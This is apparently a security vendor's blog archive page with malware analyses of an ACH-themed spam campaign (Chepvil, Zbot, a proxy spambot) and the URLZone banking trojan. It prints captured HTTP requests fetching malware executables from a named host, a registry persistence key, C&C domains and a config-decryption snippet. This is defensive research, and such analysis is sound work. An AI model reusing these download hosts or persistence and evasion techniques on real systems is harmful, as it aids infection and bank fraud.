Posts Tagged ‘Malware Analysis’

View All MalwareView All Spam

An analysis of the ACH spam campaign

By Rodel Mendrez  •  September 6th, 2011  •   Malware Spam

Recently, we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an an electronic network for financial transactions in the United States overseen by NACHA. Last week, we came across a suspicious looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained an attached malicious file using the filename “document.zip”. As suspected, the malicious file attachment was a downloader that we have seen a lot of lately – Chepvil.

ACH spam campaign from the Donbot botnet

 

The Chepvil downloader, unsurprisingly, proceeded to retrieve more than just one piece of additional malware. First was the password stealing malware, Zbot, which was obtained from the domain name rattsillis[dot]com using a standard HTTP request, downloading the file “s.exe” – a Zbot variant.

GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: rattsillis.com
Cache-Control: no-cache

The file “s.exe” is executed immediately after being downloaded and drops the following files in the infected system:

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself

C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.

Zbot then attempted to connect to a random generated domain to contact its command and control server.

The second piece of malware that Chepvil downloaded was a proxy-based spambot, an executable file “22.exe” from the same domain rattsillis[dot]com.

GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rattsillis.com
Cache-Control: no-cache 

The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 out of 45 antivirus programs with various generic detection names, although some identified it as Trojan.Scar.eaml. Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, with a file size of around 10kb.

C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe

It also drops another copy of itself in the Application Data folder using the filename format: KB{6 random number}.exe.

C:\Documents and Settings\{user}\Application Data\KB117188.exe

Then the malware adds an autorun registry key to ensure that it will survive on Windows start up.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

KB117188.exe = “”C:\Documents and Settings\{user}\Application Data\KB117188.exe”"

After installation, the parent spambot process executes the file Svchost.exe it dropped in the Windows TEMP folder and exits itself.

Instead of listening to a specific port and waiting, the proxy spambot attempts to connect to a control server by performing a standard DNS A query to the domain name luis-vuitton-elite[dot]com. However if that fails, the bot attempts to connect to a randomly generated domain name.

 

The malware code that attempts to connect to the control server

 

Once connected, the proxy spambot initializes port 1001 where it sends and receives packets of data from the control server.

Exchange of data between the control server and the spambot

 

Meanwhile at port 1002, the spambot receives the actual spam data from the control server and relays this data to the final recipients. This simple proxy can relay spam at a rate of up to 1000 messages per hour.

Spam is received by the spambot from the control server and relayed to the recipients.

 

The command and control server’s IP address is based in Germany:

WHOIS information about the control server

 

This spambot’s recent spamming activities includes both pharmaceutical, and further ACH campaigns that appears to be from NACHA.org; and are very similar to the one which led to this infection in the first place.

Sample spam email from the Proxy-based spambot

In conclusion, there is not much that is new in this sequence of events. A spammed-out trojan downloader which triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer, and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering and the best way to protect yourself is to be cautious.

Tags:    |    |    |    |    |    |  

View All Malware

Bredolab Trojan – Malware Review

By Daniel Chechik  •  December 23rd, 2010  •   Malware

Two months ago, the authorities in the Netherlands announced a massive botnet takedown of Bredolab Trojan. Despite these efforts, the Bredolab Trojan is still spreading malware on user’s machines.

Unlike the Zeus or SpyEye Trojans, the Bredolab Trojan is a pretty simple and has limited capabilities, which is similar to the Ofikla Trojan.  It’s functionality was reviewed in a very interesting and detailed blog of Kaspersky Lab Expert Alexei Kadiev “End of the Line for the Bredolab Botnet?” Our blog sheds a light on additional aspects of Bredolab communication, its evasive techniques and C&C functionality.

Let’s take a step by step look at how the Trojan operates.

Read More

Tags:    |    |    |  

View All Malware

Malware Analysis – Trojan Banker URLZone/Bebloh

By Daniel Chechik  •  September 30th, 2009  •   Malware

In our recent Cybercrime Intelligence report, we described a cybercriminal process of robbing money from bank accounts, using money mules and Trojans.

In this blog post, we will provide you with more technical aspects about the Trojan Banker URLZone/Bebloh that they used.

URLZone is a Trojan Kit that allows the attacker to use the “URLZone Builder” for creating a configuration file. This file contains precise orders to the bot, enabling the attacker to target any bank he wants (We described in the Cybercrime Intelligence report how the bot is activating account). The URLZone successfully managed to bypass the German banks’ protection using “One Time Password”. This is a technique used to enable the user to get a new password every time he logs into his account. Its goal is to make the theft of usernames and passwords worthless. In order to be successful, the malware must execute itself on the browser to change the parameters and fool the user to approve a fraudulent money transaction from his account.

Let’s now take a step-by-step look at how the Trojan operates.

Once the malware is executed, it copies itself to c:\uninstall02.exe. It then creates an ID and sends it with the version ID of the malware to the Command & Control (C&C) in order to confirm that the infected machine now contains the latest version of the malware.

The C&C logs the information and write it to REQ[x].txt
10:57:38 2009-09-24 GMT *****User ID**** ****IP****** 200908291825

Once the new executable is downloaded, it is copied to SYSTEM32 with a random name and hidden mask with the date of the operation system files.

Following is a screenshot of Virus Total scan results (2/41) for the latest generated malware:

It is important to mention URLZone (just like Zeus/Zbot and others) cannot operate on its own, since it is just a bot that is hooked into system processes and hides itself. The logic part of the malware is found in the configuration file – in our case INJECT file. The next step of the malware is downloading the configuration file.

Snippet code of the obfuscated configuration file:

The new generated configuration file is stored locally and is encrypted.

The malware itself doesn’t change any system files. In order to keep working after the victimized machine’s restart, it adds itself to the startup registry.

The malware sets itself with a “Debugger” value to the file “userinit.exe”. This ensures that every time the file “userinit.exe” runs, the malware will run instead.
The malware hooks itself to the “svchost.exe” process and checks the C&C server every 3 hours for new commands and updates. Behind the scenes, the malware checks every second whether a new instance of the following application was executed:

  • myie.exe
  • iexplore.exe
  • firefox.exe
  • mozilla.exe
  • avant.exe
  • maxthon.exe
  • thebat.exe
  • explorer.exe

Once the malware recognizes that one of the above is created, it hooks on it. The basic target of the malware (even without the configuration file) is to collect any credentials delivered by the user with HTTPS communication.

In case you wonder why the malware doesn’t collect the credentials from all the websites (even though it uses HTTPS) the answer is simple: the malware uses evasive techniques from security appliances. It limits itself to collect data that is sent by the user using POST method with less than 2,000 bytes, as shown below:

So far the malware behavior is similar to many other Trojans. However, URLZone uses the delivered configuration file to manipulate the user. Once the user opens his browser, the malware decrypts the configuration file:

The decrypting algorithm is pretty simple:
res=”"
for i in configuration_file:
res+=chr(255^ord(i));

Snippet code of the de-obfuscated configuration file:

The configuration file contains several sections – postbank.de (we are able to follow the malware steps using the screenshots it takes from the victim’s machine and transmit it to the C&C server):

The malware manages to hook at the exact moment when the victim confirms his transaction. Once the user approves the transaction the malware changes details and sends it to the server.

According to the configuration file we are capable to see the following:

In order not to raise any suspicion, the malware verifies that the user will only see what he expects.

As can be seen in the screenshot above, the malware manipulates the statistic page of the user account, maiking it look like the transaction was completed successfully. However, if we take a look at the server side reports, we see exactly how much money was actually delivered.

As can be seen from the server log above, the malware identifies that user is limited to a maximum transfer of 2000 Euro (INET_LIMIT=2000), so he transferred 1900 Euro (AMOUNT=1900.00) to the money mule account located under DROPNAME variable.

The following screen shot shows the latest version VirusTotal 5/41 detection rate of URLZone/Bebloh malware (29.9.09)
MD5: 27E8351A5B0BEA5EF15C6681007FDEE5

Posted By Daniel Chechik

Tags:    |    |    |    |    |    |    |    |